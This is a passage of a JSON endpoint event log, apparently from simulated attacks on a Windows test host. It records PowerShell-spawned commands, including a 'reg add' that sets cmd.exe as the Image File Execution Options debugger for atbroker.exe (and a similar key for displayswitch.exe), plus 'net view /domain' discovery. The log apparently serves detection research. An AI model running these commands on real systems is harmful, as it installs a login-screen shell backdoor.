"process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "registry", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", - "registry_value": "displayswitch.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "registry", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "process", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "process", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2960, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571829120000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "process", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829180000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 556, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571829730000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7292, - "ppid": 556, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571829830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "registry", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", - "registry_value": "atbroker.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "registry", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "process", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "process", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5244, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571830030000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "process", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view /domain\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5360, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571831130016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "command_line": "net view /domain", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5628, - "ppid": 5360, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883571831220000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}", - "unique_ppid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "5353", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "224.0.0.251", - "source_port": "5353", - "subtype": "incoming", - "timestamp": 131883571831380000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", - "destination_port": "5353", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "ff02:0:0:0:0:0:0:fb", - "source_port": "5353", - "subtype": "incoming", - "timestamp": 131883571831390000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883571841500000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", - "destination_port": "5355", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "fe80:0:0:0:c155:c569:9151:7881", - "source_port": "56888", - "subtype": "incoming", - "timestamp": 131883571841509984, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpInterfaceOptions", - "registry_value": "DhcpInterfaceOptions", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpIPAddress", - "registry_value": "DhcpIPAddress", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpSubnetMask", - "registry_value": "DhcpSubnetMask", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpServer", - "registry_value": "DhcpServer", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\Lease", - "registry_value": "Lease", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": 